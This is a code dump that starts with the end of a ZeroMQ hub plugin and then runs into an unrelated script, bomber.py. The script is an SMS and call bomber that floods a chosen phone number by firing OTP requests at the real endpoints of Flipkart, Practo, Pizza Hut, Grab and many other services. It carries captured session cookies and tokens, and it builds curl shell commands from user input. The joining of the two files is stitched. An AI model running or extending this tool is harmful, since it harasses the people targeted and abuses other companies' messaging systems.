        super(ZmqHubPlugin, self).on_plugin_enable()
        app_values = self.get_app_values()
        # Tear down any hub/thread left over from a previous enable.
        self.cleanup()
        self.hub_process = Process(target=_safe_run_hub,
                                   args=(MicroDropHub(app_values['hub_uri'],
                                                      self.name),
                                         getattr(logging,
                                                 app_values['log_level']
                                                 .upper())))
        # Set process as daemonic so it terminate when main process terminates.
        self.hub_process.daemon = True
        self.hub_process.start()
        _L().info('ZeroMQ hub process (pid=%s, daemon=%s)',
                  self.hub_process.pid, self.hub_process.daemon)

        # Block below until the ZeroMQ plugin has connected to the hub.
        zmq_ready = threading.Event()

        @asyncio.coroutine
        def _exec_task():
            self.zmq_plugin = ZmqPlugin('microdrop', get_hub_uri())
            self.zmq_plugin.reset()
            zmq_ready.set()
            # Park on an event that is never set; cancellation is the only
            # way out, triggered by cleanup().
            event = asyncio.Event()
            try:
                yield asyncio.From(event.wait())
            except asyncio.CancelledError:
                _L().info('closing ZeroMQ execution event loop')

        self.zmq_exec_task = cancellable(_exec_task)
        self.exec_thread = threading.Thread(target=self.zmq_exec_task)
        # BUGFIX: attribute was misspelled 'deamon', so it was never set and
        # the thread was not actually daemonic.
        self.exec_thread.daemon = True
        self.exec_thread.start()
        zmq_ready.wait()

    def cleanup(self):
        '''
        .. versionchanged:: 2.25
            Stop asyncio event loop.
        '''
        if self.hub_process is not None:
            self.hub_process.terminate()
            self.hub_process = None
        if self.exec_thread is not None:
            self.zmq_exec_task.cancel()
            self.exec_thread = None
PluginGlobals.pop_env()
|
bomber.py | #!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To SpeedX And All Other Contributors Listed At https://github.com/TheSpeedX/TBomb
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
    """Clear the terminal screen ('cls' on Windows, 'clear' elsewhere)."""
    os.system('cls' if os.name == 'nt' else 'clear')
def banner():
    """Clear the screen and print the ASCII-art logo in a random color."""
    clr()
    # NOTE(review): the logo's exact internal spacing must stay byte-identical
    # for the art to align — verify against the rendered output.
    logo="""
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ ██╗  ██╗███████╗
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗╚██╗██╔╝██╔════╝
    ███████║███████║██║     █████╔╝ █████╗  ██████╔╝ ╚███╔╝ ███████╗
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗ ██╔██╗ ╚════██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██║  ██║██╔╝ ██╗███████║
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝
    """
    # Pick one of the ANSI color codes defined at module level; W resets it.
    print(random.choice(colors)+logo+W)
    print("\n")
# Total number of messages sent by all infinite-mode threads combined.
count_inf = 0
def infinite(pn, dl, ch, max):
    """Send OTP requests to *pn* forever, as one of several worker threads.

    pn - target phone number
    dl - delay in seconds between sends
    ch - shared list of usable API indices; failing APIs are removed
    max - maximum send count.
        NOTE(review): the loop actually checks the global ``maxlim`` (not
        defined in this chunk, presumably set elsewhere in the file) and the
        ``max`` parameter is unused — confirm which limit is intended.
    """
    global count_inf
    while True:
        # Crude cross-thread mutex via a marker file: wait until no other
        # thread holds 'proc.xxx', then create it ourselves.
        while os.path.exists('proc.xxx'):
            time.sleep(0.5)
        os.system('touch proc.xxx')
        api = random.choice(ch)
        try:
            ret = getapi(pn, api, 91)
        except Exception:
            ret = False
        if not ret:
            # API failed: drop every occurrence of it from the shared list.
            while ch.count(api) > 0:
                ch.remove(api)
            # BUGFIX: release the marker file before retrying; previously it
            # was left behind on this path, stalling every sender thread
            # (including this one) in the wait loop above forever.
            os.system('rm proc.xxx >/dev/null 2>&1')
            continue
        os.system('rm proc.xxx >/dev/null 2>&1')
        count_inf += 1
        time.sleep(float(dl))
        if count_inf > maxlim:
            exit()
def checkinternet():
    """Exit the program when the connectivity probe to Google fails.

    On any request failure, prints a warning, redraws the banner and
    terminates the process; on success, returns normally.
    """
    try:
        # FIX: add a timeout so a dead connection cannot hang the probe
        # forever (requests has no default timeout).
        requests.get('https://www.google.com', timeout=10)
    except Exception:
        print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
        print('\t\tTBomb Will Stop Now...\n\n')
        banner()
        exit()
def getapi(pn,lim,cc):
    """Fire a single OTP/verification request at provider API number `lim`.

    pn  -- target phone number (digits only)
    lim -- API selector: 0-16 are SMS/OTP providers, 100-106 are call
           providers (105 is intentionally unimplemented and returns False)
    cc  -- country calling code without '+'

    Returns True when the provider appears to have accepted the request,
    False when it failed or `lim` matches no implemented API.  Several
    branches return True unconditionally because the provider gives no
    usable success indicator in its response.
    """
    cc=str(cc)
    pn=str(pn)
    lim = int(lim)
    # APIs 0-2 are plain GET endpoints; everything above needs a custom POST.
    url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
           str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
    try:
        if lim < len(url):
            urllib.request.urlopen(str(url[lim]))
            return True
    except (urllib.error.HTTPError, urllib.error.URLError):
        return False
    if lim == 3:
        # PharmEasy: JSON POST; success == HTTP 200.
        headers = {
            'Host': 'pharmeasy.in',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate, br',
            'Referer': 'https://pharmeasy.in/',
            'Content-Type': 'application/json',
            'Content-Length': '30',
            'Connection': 'keep-alive',
        }
        data = {"contactNumber":pn}
        response = requests.post('https://pharmeasy.in/api/auth/requestOTP', headers=headers, json=data)
        return response.status_code==200
    elif lim == 4:
        # Hero MotoCorp: form POST with a captured CSRF token; success == HTTP 200.
        cookies = {
            '_ga': 'GA1.2.1273460610.1561191565',
            '_gid': 'GA1.2.172574299.1561191565',
            '_gcl_au': '1.1.833556660.1561191566',
            '_fbp': 'fb.1.1561191568709.1707722126',
            'PHPSESSID': 'm5tap7nr75b2ehcn8ur261oq86',
        }
        headers={
            'Host': 'www.heromotocorp.com',
            'Connection': 'keep-alive',
            'Content-Length': '126',
            'Accept': '*/*',
            'Origin': 'https://www.heromotocorp.com',
            'X-Requested-With': 'XMLHttpRequest',
            'Save-Data': 'on',
            'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Referer': 'https://www.heromotocorp.com/en-in/xpulse200/',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
        }
        data = {
            'mobile_no': pn,
            'randome': 'ZZUC9WCCP3ltsd/JoqFe5HHe6WfNZfdQxqi9OZWvKis=',
            'mobile_no_otp': '',
            'csrf': '523bc3fa1857c4df95e4d24bbd36c61b'
        }
        response = requests.post('https://www.heromotocorp.com/en-in/xpulse200/ajax_data.php', headers=headers, cookies=cookies, data=data)
        return response.status_code==200
    elif lim == 5:
        # IndiaLends: form POST with obfuscated field names; no usable
        # success indicator, so always report True.
        cookies = {
            'Cookie:_ga': 'GA1.2.1483885314.1559157646',
            '_fbp': 'fb.1.1559157647161.1989205138',
            'TiPMix': '91.9909185226964',
            'gcb_t_track': 'SEO - Google',
            'gcb_t_keyword': '',
            'gcb_t_l_url': 'https://www.google.com/',
            'gcb_utm_medium': '',
            'gcb_utm_campaign': '',
            'ASP.NET_SessionId': 'ioqkek5lbgvldlq4i3cmijcs',
            'web_app_landing_utm_source': '',
            'web_app_landing_url': '/personal-loan',
            'webapp_landing_referral_url': 'https://www.google.com/',
            'ARRAffinity': '747e0c2664f5cb6179583963d834f4899eee9f6c8dcc773fc05ce45fa06b2417',
            '_gid': 'GA1.2.969623705.1560660444',
            '_gat': '1',
            'current_url': 'https://indialends.com/personal-loan',
            'cookies_plbt': '0',
        }
        headers = {
            'Host': 'indialends.com',
            'Connection': 'keep-alive',
            'Content-Length': '75',
            'Accept': '*/*',
            'Origin': 'https://indialends.com',
            'X-Requested-With': 'XMLHttpRequest',
            'Save-Data': 'on',
            'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Referer': 'https://indialends.com/personal-loan',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
        }
        data = {
            'aeyder03teaeare': '1',
            'ertysvfj74sje': cc,
            'jfsdfu14hkgertd': pn,
            'lj80gertdfg': '0'
        }
        response = requests.post('https://indialends.com/internal/a/mobile-verification_v2.ashx', headers=headers, cookies=cookies, data=data)
        return True
    elif lim == 6:
        # Flipkart signup-status probe. BUGFIX: the payload used the bare
        # name `true` (a NameError in Python); the JSON boolean is `True`.
        headers = {
            'host': 'www.flipkart.com',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0',
            'accept': '*/*',
            'accept-language': 'en-US,en;q=0.5',
            'accept-encoding': 'gzip, deflate, br',
            'referer': 'https://www.flipkart.com/',
            'x-user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop',
            'origin': 'https://www.flipkart.com',
            'connection': 'keep-alive',
            'Content-Type': 'application/json; charset=utf-8'}
        data = {"loginId":["+"+cc+pn],"supportAllStates":True}
        response = requests.post('https://www.flipkart.com/api/6/user/signup/status', headers=headers, json=data)
        return True
    elif lim == 7:
        # Flipkart OTP generate: form POST with captured session cookies.
        cookies = {
            'Cookie:T': 'BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050',
            'SWAB': 'build-44be9e47461a74d737914207bcbafc30',
            'lux_uid': '155867904381892986',
            'AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg': '1',
            'AMCV_17EB401053DAF4840A490D4C%40AdobeOrg': '-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI',
            's_cc': 'true',
            'SN': '2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078',
            'gpv_pn': 'HomePage',
            'gpv_pn_t': 'Homepage',
            'S': 'd1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==',
            's_sq': '%5B%5BB%5D%5D'}
        headers = {
            'Host': 'www.flipkart.com',
            'Connection': 'keep-alive',
            'Content-Length': '60',
            'X-user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop',
            'Origin': 'https://www.flipkart.com',
            'Save-Data': 'on',
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': '*/*',
            'Referer': 'https://www.flipkart.com/',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
        }
        data = {
            'loginId': '+'+cc+pn,
            'state': 'VERIFIED',
            'churnEmailRequest': 'false'
        }
        response = requests.post('https://www.flipkart.com/api/5/user/otp/generate', headers=headers, cookies=cookies, data=data)
        return True
    elif lim == 8:
        # Lenskart referral SMS gateway.
        headers = {
            'Host': 'www.ref-r.com',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
            'Accept': 'application/json, text/javascript, */*; q=0.01',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate, br',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'X-Requested-With': 'XMLHttpRequest',
            'Content-Length': '26',
            'DNT': '1',
            'Connection': 'keep-alive',
        }
        data = {
            'mobile': pn,
            'submit': '1',
            'undefined': ''
        }
        response = requests.post('https://www.ref-r.com/clients/lenskart/smsApi', headers=headers, data=data)
        return True
    elif lim == 9:
        # Practo: success when the JSON reply contains "success".
        headers = {
            'X-DROID-VERSION': '4.12.5',
            'API-Version': '2.0',
            'user-agent': 'samsung SM-G9350 0 4.4.2',
            'client-version': 'Android-4.12.5',
            'X-DROID-VERSION-CODE': '158',
            'Accept': 'application/json',
            'client-name': 'Practo Android App',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Host': 'accounts.practo.com',
            'Connection': 'Keep-Alive',
            'Content-Length': '96'}
        data = {
            'client_name': 'Practo Android App',
            'mobile': '+'+cc+pn,
            'fingerprint': '',
            'device_name':'samsung+SM-G9350'}
        response = requests.post( "https://accounts.practo.com/send_otp", headers=headers, data=data)
        rd=response.text
        return rd.find("success") != -1
    elif lim == 10:
        # Pizza Hut cart OTP. NOTE(review): the nested dict is sent with
        # `data=` (form-encoded), not `json=` — presumably accepted by the
        # server as-is; confirm before "fixing".
        headers = {
            'Host': 'm.pizzahut.co.in',
            'content-length': '114',
            'origin': 'https://m.pizzahut.co.in',
            'authorization': 'Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4',
            'x-source-origin': 'PWAFW',
            'content-type': 'application/json',
            'accept': 'application/json, text/plain, */*',
            'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
            'save-data': 'on',
            'languagecode': 'en',
            'referer': 'https://m.pizzahut.co.in/login',
            'accept-encoding': 'gzip, deflate, br',
            'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
            'cookie': 'AKA_A2=A'}
        data = {"customer":{"MobileNo":pn,"UserName":pn,"merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}
        response = requests.post('https://m.pizzahut.co.in/api/cart/send-otp?langCode=en', headers=headers, data=data)
        return True
    elif lim == 11:
        # Goibibo "download app via SMS" endpoint.
        headers = {
            'host': 'www.goibibo.com',
            'user-agent': 'Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0',
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'accept-language': 'en-US,en;q=0.5',
            'accept-encoding': 'gzip, deflate, br',
            'referer': 'https://www.goibibo.com/mobile/?sms=success',
            'content-type': 'application/x-www-form-urlencoded',
            'content-length': '14',
            'connection': 'keep-alive',
            'upgrade-insecure-requests': '1'}
        data = {'mbl': pn}
        response = requests.post('https://www.goibibo.com/common/downloadsms/', headers=headers, data=data)
        return True
    elif lim == 12:
        # Apollo Pharmacy: success when the reply mentions "sent".
        headers = {
            'Host': 'www.apollopharmacy.in',
            'content-length': '17',
            'accept': '*/*',
            'origin': 'https://www.apollopharmacy.in',
            'x-requested-with': 'XMLHttpRequest',
            'save-data': 'on',
            'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
            'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'referer': 'https://www.apollopharmacy.in/sociallogin/mobile/login/',
            'accept-encoding': 'gzip, deflate, br',
            'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
            'cookie': 'section_data_ids=%7B%22cart%22%3A1560239751%7D'}
        data = {'mobile': pn}
        response = requests.post('https://www.apollopharmacy.in/sociallogin/mobile/sendotp/', headers=headers, data=data)
        rd=response.text
        return rd.find("sent") != -1
    elif lim == 13:
        # AJIO signup OTP: success when statusCode == "1" in the JSON reply.
        # NOTE(review): mobileNumber is hard-coded to "0000" here — the OTP
        # presumably goes to the account's number, not `pn`; verify.
        cookies = {
            'Cookie:_ga': 'GA1.2.979928319.1560364071',
            '_gid': 'GA1.2.666270216.1560364071',
            'V': '201',
            '_fbp': 'fb.1.1560364076913.1528349725',
            'cto_lwid': 'd91bea3a-7610-45aa-8f78-65a0d740fb46',
            'PushSubscriberStatus': 'DENIED',
            'peclosed': 'true',
            'G_ENABLED_IDPS': 'google',
            'TS018cc593': '01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50',
            '_gac_UA-68002030-1': '1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB',
            'cdigiMrkt': 'utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C',
            'ImpressionCookie': '4',
            'ip': '10.1.10.1',
            'sessionStatus': 'true|undefined',
            'FirstPage': 'Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time)',
            '_dc_gtm_UA-68002030-1': '1',
            'uI': 'johnyaho%40gmail.com',
            'TS01fe4249': '01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c'}
        headers = {
            'Host': 'www.ajio.com',
            'Connection': 'keep-alive',
            'Content-Length': '144',
            'Accept': 'application/json',
            'Origin': 'https://www.ajio.com',
            'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
            'content-type': 'application/json',
            'Referer': 'https://www.ajio.com/signup',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6'}
        data = {"firstName":"SpeedX","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"0000","requestType":"SENDOTP"}
        response = requests.post('https://www.ajio.com/api/auth/signupSendOTP', headers=headers, cookies=cookies, json=data)
        rd=response.text
        if rd.find("\"statusCode\":\"1\"") != -1:
            return True
        else:
            return False
    elif lim == 14:
        # ALTBalaji mobile verification; success checked against a fixed
        # response hash.
        headers = {
            'Host': 'api.cloud.altbalaji.com',
            'Connection': 'keep-alive',
            'Accept': 'application/json, text/plain, */*',
            'Origin': 'https://lite.altbalaji.com',
            'Save-Data': 'on',
            'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36',
            'Content-Type': 'application/json;charset=UTF-8',
            'Referer': 'https://lite.altbalaji.com/subscribe?progress=input',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
        }
        data = {"country_code":cc,"phone_number":pn}
        response = requests.post('https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN', headers=headers, json=data)
        rd=response.text
        return rd == '24f467b24087ff48c96321786d89c69f'
    elif lim == 15:
        # Aala customer OTP; success when "code:" appears in the reply.
        cookies = {
            'Cookie:frontend': 'a27mn3h3irt1rlt6i55s93p9r5',
            'frontend_cid': '8zqBBzwQTMIt9UKg',
            '_BEAMER_USER_ID_gADrycBn12870': 'c9fe4f7d-b421-4bad-9cf2-0a4db716dff4',
            'G_ENABLED_IDPS': 'google',
        }
        headers = {
            'Host': 'www.aala.com',
            'Connection': 'keep-alive',
            'Accept': 'application/json, text/javascript, */*; q=0.01',
            'Origin': 'https://www.aala.com',
            'X-Requested-With': 'XMLHttpRequest',
            'Save-Data': 'on',
            'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Referer': 'https://www.aala.com/',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5',
        }
        data = {
            'email': cc+pn,
            'firstname': 'SpeedX',
            'lastname': 'SpeedX'
        }
        response = requests.post('https://www.aala.com/accustomer/ajax/getOTP', headers=headers, cookies=cookies, json=data)
        rd=response.text
        return rd.find('code:') != -1
    elif lim == 16:
        # Grab ID phone OTP.
        data = {
            'method': 'SMS',
            'countryCode': 'id',
            'phoneNumber': cc+pn,
            'templateID': 'pax_android_production'
        }
        response = requests.post('https://api.grab.com/grabid/v1/phone/otp', data=data)
        return True
    elif lim == 100:
        # --- Call-bombing APIs (100+) follow; these shell out to curl. ---
        rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
                      pn + '?callType=otpOnCall"').read()
        return rd.lower().find("new otp has been") != -1
    elif lim == 101:
        rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
                      ' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
        return rd.lower().find("otp requests exceeded") == -1
    elif lim == 102:
